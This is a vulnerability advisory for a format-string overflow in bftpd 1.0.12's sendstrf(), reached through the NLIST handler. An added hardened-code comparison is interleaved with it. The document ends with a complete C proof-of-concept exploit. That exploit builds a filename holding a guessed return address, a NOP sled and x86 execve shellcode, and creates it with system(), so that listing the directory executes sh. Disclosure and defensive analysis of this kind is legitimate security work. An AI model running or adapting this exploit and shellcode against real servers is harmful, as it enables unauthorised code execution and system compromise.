Bftpd 1.0.12 passes user-controlled filenames as the format string to vsprintf in sendstrf(), letting a crafted filename overflow the reply buffer. Proof-of-concept exploit included.
bftpd 1.0.12 passes a user-controlled string as the format argument of vsprintf in the function sendstrf:
int sendstrf(int s, char *format, ...) {
....
vsprintf(buffer, format, val);
The function is called from the NLIST command handler with the directory entry name as the format string:
else
foo = 1;
sendstrf(s, entry->d_name);
}
Because the filename is interpreted as a format string, a directive such as %.260x expands to far more output than the fixed-size buffer used by vsprintf can hold, overflowing it and allowing arbitrary code to be executed. I don't think it can normally be used for a remote attack, because bftpd removes all non-printable characters from input strings, so it is not possible to remotely place shellcode in a filename.
A demonstration program is attached.
asynchro@pkcrew.org
www.pkcrew.org
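The sendstrf() pattern described above, shown beside a hardened form, as an added example that is not bftpd's own code. The buffer size SENDBUF and the function names are assumptions for illustration; the vulnerable shape only measures (with vsnprintf and a NULL buffer) how long the formatted reply would be, so the program itself never corrupts memory:

```c
/* Added example, not code from bftpd: user text as a printf format
 * (the sendstrf() bug) versus a constant format with a bounded write. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define SENDBUF 256   /* assumed size of the fixed reply buffer */

/* Vulnerable shape: the caller's text becomes the format string, so a
 * filename such as "%.260x" is expanded to 260 characters although no
 * argument backs the directive. Only the length is measured here. */
size_t unsafe_reply_len(const char *text_as_format, ...)
{
    va_list ap;
    va_start(ap, text_as_format);
    int n = vsnprintf(NULL, 0, text_as_format, ap);
    va_end(ap);
    return n < 0 ? 0 : (size_t)n;
}

/* Would sendstrf(s, name) plus the trailing "\r\n" overflow SENDBUF? */
int nlist_would_overflow(const char *name)
{
    return unsafe_reply_len(name) + 2 >= SENDBUF;
}

/* Hardened shape: constant format, the data passed as an argument, and a
 * size-bounded write. Returns the number of bytes placed in out. */
size_t safe_reply(char *out, size_t outlen, const char *name)
{
    int n = snprintf(out, outlen, "%s\r\n", name);
    if (n < 0)
        return 0;
    return (size_t)n < outlen ? (size_t)n : outlen - 1;
}

/* Convenience wrapper: bytes the hardened form writes for a given name. */
size_t safe_reply_len(const char *name)
{
    char out[SENDBUF];
    return safe_reply(out, sizeof out, name);
}

/* Bytes written for a name of name_len 'A's; shows the cap at SENDBUF-1
 * even when the name alone is longer than the buffer. */
size_t safe_reply_len_for_name_of(size_t name_len)
{
    char name[1024], out[SENDBUF];
    if (name_len >= sizeof name)
        name_len = sizeof name - 1;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    return safe_reply(out, sizeof out, name);
}

int main(void)
{
    const char *evil = "%.260x";   /* constructed: the filename the PoC creates */
    printf("unsafe expansion of \"%s\": %zu bytes (overflow: %d)\n",
           evil, unsafe_reply_len(evil), nlist_would_overflow(evil));
    printf("hardened reply for the same name: %zu bytes\n", safe_reply_len(evil));
    printf("hardened reply for a 300-byte name: %zu bytes\n",
           safe_reply_len_for_name_of(300));
    return 0;
}
```

The bounded variant still truncates long names rather than reporting an error; a server would normally prefer to reject such entries outright, but truncation is enough to keep the write inside the buffer.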
/*
Creates a filename to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)
hints by |CyRaX| & Cthulhu
coded by asynchro
www.pkcrew.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 512
#define NOP 124

int main(void)
{
    int i;
    char *buff;
    char nop = 0x90;
    /* return address guessed for the target's stack layout */
    char addr[] = "\xd4\xf9\xff\xbf";
    /* "%.260x" is expanded by vsprintf to 260 characters, overflowing the buffer */
    char command[] = "touch %.260x";
    /* Linux x86 execve() shellcode; the program name "sh" follows it */
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xffsh";

    buff = (char *)malloc(BUFSIZE);
    if (buff == NULL)
        return 1;
    memset(buff, 0x0, BUFSIZE);
    memcpy(buff, command, sizeof(command));   /* includes the terminating NUL */
    strncat(buff, addr, 4);
    strncat(buff, addr, 4);
    for (i = 0; i < NOP; i++)
        strncat(buff, &nop, 1);               /* NOP sled */
    strncat(buff, shellcode, strlen(shellcode));
    system(buff);                             /* creates the malicious filename */
    free(buff);
    return 0;
}